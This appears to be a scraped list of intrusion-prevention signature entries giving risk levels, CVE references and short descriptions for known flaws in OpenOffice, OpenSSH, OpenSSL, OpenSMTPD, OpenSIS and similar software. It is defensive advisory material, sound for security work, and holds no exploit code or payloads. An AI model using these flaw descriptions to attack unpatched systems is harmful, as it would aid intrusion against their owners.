Situation:

File-OLE_OpenOffice-OLE-File-Stream-Buffer-Overflow

References:

CVE-2008-0320
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0320

BID-28819
http://www.securityfocus.com/bid/28819

OpenOffice-TIFF-File-Parsing-Integer-Overflow

About this vulnerability:

A vulnerability in OpenOffice

Risk:

Moderate

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1412-5242

Platform:

Generic

Software:

OpenOffice.org

Type:

Integer Overflow

Description:

An integer overflow vulnerability exists in the OpenOffice software suite.

Situation:

HTTP_SS-OpenOffice-TIFF-File-Parsing-Integer-Overflow

References:

CVE-2007-2834
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2834

BID-25690
http://www.securityfocus.com/bid/25690

OpenOffice.org-Microsoft-Word-File-Processing-Integer-Underflow

About this vulnerability:

A vulnerability in OpenOffice.org OpenOffice

Risk:

Moderate

First detected in:

sgpkg-ips-413-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenOffice.org

Type:

Integer Overflow

Description:

An integer underflow vulnerability has been reported in OpenOffice. The vulnerability is due to an error processes sprmTDefTable records in Microsoft Word files. A remote unauthenticated attacker could leverage this vulnerability by enticing a target user to open a malicious Microsoft Word file with a vulnerable version of the application. In a successful attack, it may result in a heap overflow leading to the possibility of code execution within the security context of the currently logged on user. In an unsuccessful attack, the target application could terminate abnormally.

Situation:

File-OLE_OpenOffice-MS-Word-File-Processing-Integer-Underflow

References:

CVE-2009-3301
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3301

BID-38218
http://www.securityfocus.com/bid/38218

OpenOffice.org-RTF-File-Parsing-Heap-Buffer-Overflow

About this vulnerability:

A heap buffer overflow vulnerability in OpenOffice.org

Risk:

High

First detected in:

sgpkg-ips-113-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenOffice.org

Type:

Buffer Overflow

Description:

There is a heap buffer overflow vulnerability in the OpenOffice.org software suite. The vulnerability is due to the way OpenOffice.org parses specially crafted Rich Text Format (RTF) documents. A remote attacker could exploit this vulnerability by persuading a user to open a specially crafted RTF file, potentially causing arbitrary code to be injected and executed in the security context of the logged in user.

Situation:

HTTP_OpenOffice.org-RTF-File-Parsing-Heap-Buffer-Overflow
File-RTF_OpenOffice.org-RTF-File-Parsing-Heap-Buffer-Overflow

References:

CVE-2007-0245
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0245

BID-24450
http://www.securityfocus.com/bid/24450

OSVDB-35378
http://www.osvdb.org/35378

OpenOffice.org-XPM-File-Processing-Integer-Overflow

About this vulnerability:

A vulnerability in OpenOffice.org OpenOffice

Risk:

Moderate

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenOffice.org

Type:

Integer Overflow

Description:

An integer overflow vulnerability has been reported in OpenOffice. The vulnerability is due to a boundary error when the XPMReader::ReadXPM function in xpmread.cxx in OpenOffice.org processes XPM files. A remote unauthenticated attacker could leverage this vulnerability by enticing a target user to open a malicious XPM file with a vulnerable application. In a successful attack, it may result in a heap overflow leading to the possibility of code execution within the security context of the currently logged on user. In an unsuccessful attack, the target application could terminate abnormally.

Situation:

File-TextId_OpenOffice.org-XPM-File-Processing-Integer-Overflow

References:

CVE-2009-2949
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2949

BID-38218
http://www.securityfocus.com/bid/38218

OpenProject-Cross-Site-Scripting-CVE-2019-17092

About this vulnerability:

A vulnerability in OpenProject

Risk:

High

First detected in:

sgpkg-ips-1375-5242

Last changed:

sgpkg-ips-1375-5242

Platform:

Generic

Software:

OpenProject

Type:

Cross-site Scripting

Description:

There exists a cross-site scripting vulnerability in OpenProject versions before 9.0.4 and 10.0.2. A successful exploitation can allow remote attackers to execute arbitrary HTML and script code via the sortBy parameter.

Situation:

HTTP_CRL-OpenProject-Cross-Site-Scripting-CVE-2019-17092

References:

CVE-2019-17092
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17092

OpenSIS-Modname-Code-Execution

About this vulnerability:

An OpenSIS Modname Code Execution vulnerability

Risk:

High

First detected in:

sgpkg-ips-781-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSIS

Type:

Code Injection

Description:

A vulnerability in OpenSIS, vesions 4.5 to 5.2, which allows remote attackers to inject and execute arbitrary code through the modname parameter in ajax.php.

Situation:

HTTP_CRL-OpenSIS-Modname-Code-Execution

References:

CVE-2013-1349
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1349

OSVDB-100676
http://www.osvdb.org/100676

OpenSIS-Unauthenticated-PHP-Code-Execution

About this vulnerability:

A vulnerability in openSIS

Risk:

High

First detected in:

sgpkg-ips-1346-5242

Last changed:

sgpkg-ips-1346-5242

Platform:

Generic

Software:

OpenSIS

Type:

Input Validation

Description:

There exists a vulnerability in OpenSIS, versions 7.4 and before, which allows remote attackers to execute arbitrary PHP code throught the scheduling/MassSchedule.php module due to the insufficient user input validation.

Situation:

HTTP_CRL-OpenSIS-Unauthenticated-PHP-Code-Execution

References:

CVE-2020-13381
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13381

OpenSLP-Project-And-VMware-OpenSLP-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in OpenSLP

Risk:

Moderate

First detected in:

sgpkg-ips-1211-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSLP; EMC VMware ESXi Server; VMWare Horizon

Type:

Buffer Overflow

Description:

There exists a pre-auth heap buffer overflow vulnerability in OpenSLP and VMware ESXi and Horizon DaaS. Successful exploitation could lead in arbitrary code execution.

Situation:

Generic_UDP-OpenSLP-Project-And-VMware-OpenSLP-Heap-Buffer-Overflow

References:

CVE-2019-5544
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5544

OpenSMTPD-Mta_io-Out-Of-Bounds-Read-Command-Execution

About this vulnerability:

A vulnerability in OpenSMTPD

Risk:

Moderate

First detected in:

sgpkg-ips-1240-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSMTPD

Type:

Input Validation

Description:

Improper handling of multiline replies in mta_io() causes an out of bounds read vulnerability in OpenSMPTD. A successful attack allows an attacker to execute arbitrary code on the target with the privileges of the target process.

Situation:

SMTP_SS-OpenSMTPD-Mta_io-Out-Of-Bounds-Read-Command-Execution

References:

CVE-2020-8794
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8794

OpenSMTPD_Command-Injection_CVE-2020-7247

About this vulnerability:

A vulnerability in OpenSMTPD

Risk:

Moderate

First detected in:

sgpkg-ips-1220-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSMTPD

Type:

Input Validation

Description:

There has been reported a command injection vulnerability in OpenSMTPD. This vulnerability could be exploited by a remote attacker. Successful exploitation can lead in arbitrary code execution.

Situation:

SMTP_CS-OpenSMTPD-Command-Injection-CVE-2020-7247

References:

CVE-2020-7247
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7247

OpenSSH-Backdoor-C2-Traffic

About this vulnerability:	OpenSSH backdoor traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1125-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Linux
Software:	<os>
Type:	Backdoor
Description:	Command & control traffic originating from a backdoor of OpenSSH was detected.
Situation:	HTTP_CRL-OpenSSH-Backdoor-C2-Traffic

OpenSSH-Challenge-Response-Integer-Overflow

About this vulnerability:

Challenge Response OpenSSH Integer Overflow

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSH

Type:

Integer Overflow

Description:

Unpathced OpenSSH daemon versions up to 3.3p1 have a remotely exploitable interger overflow vulnerability. If successfully exploited, this vulnerability provides the attacker a remote root access. There are working exploit tools for this vulnerabilitiy in the wild.

Situation:

SSH_Integer-Overflow-Attack-Detect-Gobbles
SSH_Integer-Overflow-Attack-Detect
SSH_Integer-Overflow-Attack-Detect-Gobbles-Reply
SSH_Bad-Version-Comment-Gobbles

References:

CVE-2002-0639
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0639

BID-5093
http://www.securityfocus.com/bid/5093

OSVDB-6245
http://www.osvdb.org/6245

OpenSSH-Kex_Input_Kexinit-Denial-Of-Service

About this vulnerability:

A vulnerability in OpenSSH

Risk:

Moderate

First detected in:

sgpkg-ips-840-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSH

Type:

Resource Starvation

Description:

Improper handling of client-sent key exchange initialization messages can be used to cause a denial of service condition on an OpenSSH server.

Situation:

SSH_OpenSSH-Kex_Input_Kexinit-Denial-Of-Service

References:

CVE-2016-8858
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8858

BID-93776
http://www.securityfocus.com/bid/93776

OpenSSH-Man-In-The-Middle-Via-VerifyHostKeyDNS-CVE-2025-26465

About this vulnerability:

An attempt to exploit a vulnerability in OpenSSH server detected

Risk:

High

First detected in:

sgpkg-ips-1839-5242

Last changed:

sgpkg-ips-1839-5242

Platform:

Generic

Software:

OpenSSH

Type:

Input Validation

Description:

A vulnerability was found in OpenSSH when the "VerifyHostKeyDNS" option is enabled. A man-in-the-middle (MitM) attack can be performed by a malicious machine impersonating a legit server. This issue occurs due to how OpenSSH mishandles error codes in specific conditions when verifying the host key. For an attack to be considered successful, the attacker needs to manage to exhaust the client's memory resource first, turning the attack complexity high.

Situation:

SSH_Suspiciously-Large-SSH-Server-Certificate-CVE-2025-26465

References:

CVE-2025-26465
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-26465

OpenSSH-Pre-Authentication-Denial-Of-Service-CVE-2025-26466

About this vulnerability:

An attempt to exploit a vulnerability in OpenSSH detected

Risk:

High

First detected in:

sgpkg-ips-1839-5242

Last changed:

sgpkg-ips-1839-5242

Platform:

Generic

Software:

OpenSSH

Type:

Resource Starvation

Description:

The OpenSSH client and server are vulnerable to a pre-authentication denial-of-service (DoS) attack: an asymmetric resource consumption of both memory and CPU. This vulnerability was introduced in August 2023 (shortly before OpenSSH 9.5p1) by commit dce6d80 ("Introduce a transport-level ping facility"). It could be exploited by attackers using SSH2_MSG_PING packets.

Situation:

SSH_OpenSSH-Client-Pre-Authentication-Denial-Of-Service-CVE-2025-26466
SSH_OpenSSH-Server-Pre-Authentication-DoS-CVE-2025-26466

References:

CVE-2025-26466
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-26466

OpenSSH-Sftp-Server.c-Denial-Of-Service

About this vulnerability:

A vulnerability in OpenSSH

Risk:

Moderate

First detected in:

sgpkg-ips-1077-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSH

Type:

Resource Starvation

Description:

There exists a denial of service vulnerability in OpenSSH.

Situation:

SSH_CS-OpenSSH-Sftp-Server.c-Denial-Of-Service

References:

CVE-2017-15906
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15906

BID-101552
http://www.securityfocus.com/bid/101552

OpenSSH-Sshd-SSH_old_dhgex-Handling-Double-Free-Vulnerability

About this vulnerability:

A vulnerability in OpenSSH

Risk:

High

First detected in:

sgpkg-ips-1566-5242

Last changed:

sgpkg-ips-1566-5242

Platform:

Generic

Software:

OpenSSH

Type:

Malfunction

Description:

A double free vulnerability has been reported in OpenSSH. The vulnerability is due to an error in the compat_kex_proposal() function of compat.c. An unauthenticated, remote attacker can exploit this by sending crafted packets to the target server. Successful exploitation could result in denial of service or potentially arbitrary code execution.

Situation:

SSH_OpenSSH-Sshd-SSH_old_dhgex-Handling-Double-Free-Vulnerability

References:

CVE-2023-25136
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25136

OpenSSH-Sshd-Username-Information-Disclosure

About this vulnerability:

A vulnerability in OpenSSH

Risk:

Moderate

First detected in:

sgpkg-ips-1213-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSH

Type:

Malfunction

Description:

There has been reported an information disclosure vulnerability in OpenSSH. Successful exploitation could lead in information disclosure.

Situation:

SSH_CS-OpenSSH-Sshd-Username-Information-Disclosure

References:

CVE-2018-15473
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15473

OpenSSL-Alternative-Chains-Certificate-Forgery-Policy-Bypass

About this vulnerability:

A vulnerability in OpenSSL Project OpenSSL

Risk:

High

First detected in:

sgpkg-ips-662-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Malfunction

Description:

A policy bypass vulnerability has been reported in OpenSSL. This is due to incorrectly implemented certificate chain verification, where forged certificates signed by certain non-CA leaf certificates are treated as valid by vulnerable versions of OpenSSL. An attacker could use a crafted certificate chain to bypass TLS certificate validation checks in OpenSSL client or server applications. Successful exploitation could allow a remote attacker to bypass authentication by impersonating users or services.

Situation:

HTTPS_CS-OpenSSL-Alternative-Chains-Certificate-Forgery-Policy-Bypass
HTTPS_SS-OpenSSL-Alternative-Chains-Certificate-Forgery-Policy-Bypass

References:

CVE-2015-1793
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1793

BID-75652
http://www.securityfocus.com/bid/75652

OpenSSL-Anonymous-ECDH-Denial-Of-Service

About this vulnerability:

A vulnerability in OpenSSL Project OpenSSL

Risk:

High

First detected in:

sgpkg-ips-598-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Malfunction

Description:

A denial of service vulnerability exists in OpenSSL. The vulnerability is due to a NULL pointer dereference in processing handshake messages using anonymous ECDH ciphersuites. A remote, unauthenticated attacker could exploit this vulnerability by sending specially crafted messages to a target. Successful exploitation could lead to a denial of service condition.

Situation:

HTTPS_SS-OpenSSL-Anonymous-ECDH-Denial-Of-Service

References:

CVE-2014-3470
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470

BID-67898
http://www.securityfocus.com/bid/67898

OSVDB-107731
http://www.osvdb.org/107731

OpenSSL-ASN.1-Client-Certificate-Double-Free-Code-Execution

About this vulnerability:

Double-free memory allocation error in OpenSSL ASN.1 parsing

Risk:

Low

First detected in:

sgpkg-ips-102-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Malfunction

Description:

A double-free memory allocation error allows remote attackers to cause a Denial of Service (DoS) and may allow the execution of arbitrary code via an SSL client certificate with crafted invalid ASN.1 encoding.

Situation:

HTTPS_CS-OpenSSL-ASN.1-Client-Certificate-Double-Free-Code-Execution

References:

CVE-2003-0545
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0545

BID-8732
http://www.securityfocus.com/bid/8732

OSVDB-3684
http://www.osvdb.org/3684

OpenSSL-ASN.1-Client-Sertificate-BOF

About this vulnerability:

Buffer overflow in OpenSSL ASN.1 parsing

Risk:

Low

First detected in:

sgpkg-ips-115-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Buffer Overflow

Description:

A remote overflow exists in OpenSSL. OpenSSL fails to correctly parse ASN.1 tags in OpenSSL client certificates, resulting in a buffer overflow. With a specially crafted request, an attacker can cause Denial of Service (DoS) in OpenSSL or in an application using it.

Situation:

HTTPS_CS-SSL-ASN.1-Bruteforcer-Tool-Usage

References:

CVE-2003-0544
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0544

BID-8732
http://www.securityfocus.com/bid/8732

OSVDB-3686
http://www.osvdb.org/3686

OpenSSL-ASN.1-Integer-Overflow-DoS

About this vulnerability:

Integer overflow in OpenSSL ASN.1 parsing

Risk:

Low

First detected in:

sgpkg-ips-115-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Malfunction

Description:

A remote overflow exists in OpenSSL. OpenSSL fails to correctly handle error conditions in ASN.1 tags in SSL client certificates, resulting in an integer overflow. With a specially crafted request an attacker can cause Denial of Service (DoS) in OpenSSL or in an application using it.

Situation:

HTTPS_CS-SSL-ASN.1-Bruteforcer-Tool-Usage

References:

CVE-2003-0543
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0543

BID-8732
http://www.securityfocus.com/bid/8732

OSVDB-3949
http://www.osvdb.org/3949

OpenSSL-ASN1-Type_cmp-Denial-Of-Service

About this vulnerability:

A vulnerability in OpenSSL Project OpenSSL

Risk:

High

First detected in:

sgpkg-ips-639-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Malfunction

Description:

A denial of service vulnerability exists in OpenSSL. The vulnerability is due to a null pointer dereference error when an OpenSSL application receives and processes a crafted certificate. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted client certificate to a vulnerable server application that requests it. Successful exploitation will cause the server application to crash, resulting in a denial-of-service condition.

Situation:

HTTPS_SS-OpenSSL-ASN1_Type_cmp-Denial-Of-Service

References:

CVE-2015-0286
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0286

BID-73225
http://www.securityfocus.com/bid/73225

OpenSSL-BN_Mod_sqrt-Infinite-Loop

About this vulnerability:

A vulnerability in OpenSSL.

Risk:

High

First detected in:

sgpkg-ips-1446-5242

Last changed:

sgpkg-ips-1446-5242

Platform:

Generic

Software:

OpenSSL

Type:

Infinite Loop

Description:

A vulnerability exists in OpenSSL versions 1.0.2, 1.1.1 and 3.0 which enables a remote attacker to trigger an infinite loop via a crafted certificate.

Situation:

HTTPS_CS-OpenSSL-BN_Mod_sqrt-Infinite-Loop
HTTPS_SS-OpenSSL-BN_Mod_sqrt-Infinite-Loop

References:

CVE-2022-0778
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778

OpenSSL-Chacha20-poly1305-And-Rc4-md5-Integer-Underflow

About this vulnerability:

A vulnerability in OpenSSL Project OpenSSL

Risk:

High

First detected in:

sgpkg-ips-854-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Integer Overflow

Description:

There exists an integer underflow vulnerability in OpenSSL. A remote attacker can use this to cause a denial of service situation.

Situation:

HTTPS_SS-OpenSSL-Chacha20-poly1305-And-Rc4-md5-Integer-Underflow

References:

CVE-2017-3731
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3731

OpenSSL-ChangeCipher-MITM-Security-Bypass

About this vulnerability:

A vulnerability in OpenSSL

Risk:

Moderate

First detected in:

sgpkg-ips-590-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Malfunction

Description:

There is a security bypass vulnerability in OpenSSL. The vulnerability is due to a weakness in OpenSSL methods used for keying material when processing ChangeCipherSpec messages. A remote, unauthenticated, man-in-the-middle attacker could exploit this vulnerability by using a specially crafted handshake to force the use of weak keying material. Successful exploitation would provide an attacker the ability to decrypt traffic and inject plaintext into a TLS connection.

Situation:

HTTPS_CS-OpenSSL-ChangeCipher-Before-Key-Exchange

References:

CVE-2014-0224
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224

BID-67899
http://www.securityfocus.com/bid/67899

OSVDB-107729
http://www.osvdb.org/107729

OpenSSL-CMS-Structure-OriginatorInfo-Memory-Corruption

About this vulnerability:

A vulnerability in OpenSSL Project OpenSSL

Risk:

High

First detected in:

sgpkg-ips-319-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Malfunction

Description:

A memory corruption vulnerability exists in OpenSSL library. The vulnerability is due to an error in handling CMS (Cryptographic Message Syntax) structures. If a CMS structure contains a crafted 'OriginatorInfo' value, the vulnerable code could write to an invalid memory location or cause a double-free. Remote attackers could exploit this vulnerability by sending a specially crafted CMS message to the target application using the vulnerable version of the OpenSSL library. Successful exploitation may allow for arbitrary code execution with the privileges of the application using the OpenSSL library.

Situation:

Shared_SS-OpenSSL-CMS-Structure-OriginatorInfo-Memory-Corruption
File-Binary_OpenSSL-CMS-Structure-OriginatorInfo-Memory-Corruption

References:

CVE-2010-0742
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0742

BID-40502
http://www.securityfocus.com/bid/40502

OpenSSL-CRL-Verification-X.400-Address-Handling-Type-Confusion-Vulnerability

About this vulnerability:

A vulnerability in OpenSSL

Risk:

High

First detected in:

sgpkg-ips-1564-5242

Last changed:

sgpkg-ips-1578-5242

Platform:

Generic

Software:

OpenSSL

Type:

Malfunction

Description:

A type confusion vulnerability has been reported in the OpenSSL. The vulnerability is due to improper X.400 address processing inside an X.509 GeneralName. A remote attacker could exploit the vulnerability by sending crafted traffic to the target system. Successful exploitation could result in denial of service or sensitive information disclosure.

Situation:

HTTPS_SS-OpenSSL-CRL-Verification-X.400-Address-Handling-Type-Confusion-Vulnerability
TLS_CS-OpenSSL-CRL-Verification-X.400-Address-Handling-Type-Confusion-Vulnerability
File-Binary_OpenSSL-CRL-Verification-X.400-Address-Handling-Type-Confusion-Vulnerability

References:

CVE-2023-0286
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286

OpenSSL-C_rehash-Script-Command-Injection-Vulnerability

About this vulnerability:

A vulnerability in OpenSSL

Risk:

High

First detected in:

sgpkg-ips-1480-5242

Last changed:

sgpkg-ips-1480-5242

Platform:

Generic

Software:

OpenSSL

Type:

Input Validation

Description:

A command injection vulnerability has been reported in the OpenSSL. The vulnerability is due to improper validation of shell metacharacters. A remote attacker could exploit the vulnerability by enticing the target user to parse malicious files. Successful exploitation could result in command execution within the context of the target user.

Situation:

File-Name_OpenSSL-C-rehash-Script-Command-Injection-Vulnerability

References:

CVE-2022-1292
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292

OpenSSL-C_rehash-Script-CVE-2022-2068-Command-Injection-Vulnerability

About this vulnerability:

A vulnerability in OpenSSL

Risk:

High

First detected in:

sgpkg-ips-1484-5242

Last changed:

sgpkg-ips-1606-5242

Platform:

Generic

Software:

OpenSSL

Type:

Input Validation

Description:

Situation:

File-Binary_Suspicious-Long-Name-In-Gnu-Tar-Archive
File-Name_OpenSSL-C_rehash-Script-CVE-2022-2068-Command-Injection-Vulnerability

References:

CVE-2022-2068
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068

OpenSSL-Dhe-Client-Key-Exchange-Denial-Of-Service

About this vulnerability:

A vulnerability in OpenSSL Project OpenSSL

Risk:

High

First detected in:

sgpkg-ips-640-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Malfunction

Description:

A denial of service vulnerability exists in OpenSSL. The vulnerability is due to a null pointer dereference that occurs when an OpenSSL application receives and processes a Client Certificate and a crafted Client Key Exchange handshake message. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted handshake message to a vulnerable server application. Successful exploitation will cause the server application to crash, resulting in a denial-of-service condition.

Situation:

HTTPS_CS-OpenSSL-Dhe-Client-Key-Exchange-Denial-Of-Service

References:

CVE-2015-1787
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1787

BID-73238
http://www.securityfocus.com/bid/73238

OpenSSL-DTLS-Dtls1_Buffer_Record-Denial-Of-Service

About this vulnerability:

A vulnerability in OpenSSL Project OpenSSL

Risk:

Moderate

First detected in:

sgpkg-ips-670-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Resource Starvation

Description:

A denial of service vulnerability has been reported in OpenSSL. The vulnerability is due to memory exhaustion when parsing specially crafted DTLS packets. A remote, unauthenticated attacker can exploit this vulnerability by sending a large number of crafted packets to a vulnerable server. Successful exploitation will result in high memory consumption and lead to a denial of service condition.

Situation:

Generic_UDP-OpenSSL-DTLS-Dtls1_Buffer_Record-Denial-Of-Service

References:

CVE-2015-0206
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206

OSVDB-116791
http://www.osvdb.org/116791

OpenSSL-DTLS-Handshake-Double-Free

About this vulnerability:

A vulnerability in OpenSSL Project OpenSSL

Risk:

Moderate

First detected in:

sgpkg-ips-669-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Malfunction

Description:

A denial of service vulnerability exists in OpenSSL. The vulnerability is due to a double free error during reassembly of the fragmented DTLS handshake. A remote, unauthenticated attacker could exploit this vulnerability by sending specially crafted message to a target. Successful exploitation could lead to a denial of service condition.

Situation:

Generic_UDP-OpenSSL-DTLS-Handshake-Double-Free

References:

CVE-2014-3505
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3505

BID-69081
http://www.securityfocus.com/bid/69081

OSVDB-109893
http://www.osvdb.org/109893

OpenSSL-DTLS-Handshake-Memory-Exhaustion

About this vulnerability:

A vulnerability in OpenSSL Project OpenSSL

Risk:

High

First detected in:

sgpkg-ips-602-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Resource Starvation

Description:

A denial of service vulnerability exists in OpenSSL. The vulnerability is due to large memory consumption during reassembly of the fragmented DTLS handshake. A remote, unauthenticated attacker could exploit this vulnerability by sending specially crafted messages to a target. Successful exploitation could lead to a denial of service condition.

Situation:

Generic_UDP-OpenSSL-DTLS-Handshake-Memory-Exhaustion

References:

CVE-2014-3506
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3506

BID-69076
http://www.securityfocus.com/bid/69076

OSVDB-109892
http://www.osvdb.org/109892

OpenSSL-DTLS-Packet-ChangeCipherSpec-Remote-DoS

About this vulnerability:

A OpenSSL DTLS Packet ChangeCipherSpec Remote DoS vulnerability.

Risk:

High

First detected in:

sgpkg-ips-681-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Null Pointer Dereference

Description:

A vulnerability in OpenSSL, before 0.9.8i, allows remote attackers to cause a denial of service condition with a NULL pointer dereference via a DTLS ChangeCipherSpec packet sent before a ClientHello.

Situation:

Generic_UDP-OpenSSL-DTLS-Packet-ChangeCipherSpec-Remote-DoS

References:

CVE-2009-1386
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1386

BID-35174
http://www.securityfocus.com/bid/35174

OSVDB-55073
http://www.osvdb.org/55073

OpenSSL-DTLS-Recursion-Denial-Of-Service

About this vulnerability:

A vulnerability in OpenSSL Project OpenSSL

Risk:

High

First detected in:

sgpkg-ips-593-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Malfunction

Description:

A denial-of-service vulnerability exists in OpenSSL. The vulnerability is due to the possibility of unbounded recursion in dtls1_get_message_fragment() during the processing of DTLS handshake messages. A remote, unauthenticated attacker could exploit this vulnerability by sending a malicious DTLS handshake to a target. Successful exploitation could lead to a denial-of-service condition.

Situation:

Generic_UDP-DTLS-ServerHello-Request

References:

CVE-2014-0221
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0221

BID-67901
http://www.securityfocus.com/bid/67901

OSVDB-107732
http://www.osvdb.org/107732

OpenSSL-DTLS-Srtp-Extension-Parsing-Denial-Of-Service

About this vulnerability:

A vulnerability in OpenSSL Project OpenSSL

Risk:

Moderate

First detected in:

sgpkg-ips-614-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Resource Starvation

Description:

A denial-of-service vulnerability exists in OpenSSL. The vulnerability is due to a memory leak in the DTLS SRTP extension parsing code, which is called in both SSL/TLS and DTLS applications regardless of whether the DTLS SRTP extension is used or configured. A remote, unauthenticated attacker can send crafted handshake messages to cause memory leaks, exhaust system memory and create a denial of service condition on an application using the vulnerable library.

Situation:

HTTPS_CS-OpenSSL-DTLS-Srtp-Extension-Parsing-Denial-Of-Service

References:

CVE-2014-3513
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513

BID-70584
http://www.securityfocus.com/bid/70584

OSVDB-113373
http://www.osvdb.org/113373

OpenSSL-Dtls1_Process_Out_Of_Seq_Message-Denial-Of-Service

About this vulnerability:

A vulnerability in OpenSSL Project OpenSSL

Risk:

High

First detected in:

sgpkg-ips-602-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Resource Starvation

Description:

A denial of service vulnerability exists in OpenSSL. The vulnerability is due to memory leak in dtls1_process_out_of_seq_message function. A remote, unauthenticated attacker could exploit this vulnerability by sending specially crafted messages to a target. Successful exploitation could lead to a denial of service condition.

Situation:

Generic_UDP-OpenSSL-DTLS-Client-Hello-Zero-Fragment-Length

References:

CVE-2014-3507
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3507

BID-69078
http://www.securityfocus.com/bid/69078

OSVDB-109891
http://www.osvdb.org/109891

OpenSSL-Dtls1_Reassemble_Fragment-Invalid-Fragment-Buffer-Overflow

About this vulnerability:

A vulnerability in OpenSSL Project OpenSSL

Risk:

High

First detected in:

sgpkg-ips-604-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in OpenSSL. The vulnerability is due to an inconsistency error in the OpenSSL method used for processing DTLS fragments. A remote unauthenticated attacker could exploit this vulnerability by sending a malicious DTLS fragmented message to a target. Successful exploitation could lead to arbitrary code execution in the security context of the affected user.

Situation:

Generic_UDP-OpenSSL-Dtls1_Reassemble_Fragment-Invalid-Fragment-Buffer-Overflow

References:

CVE-2014-0195
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0195

BID-67900
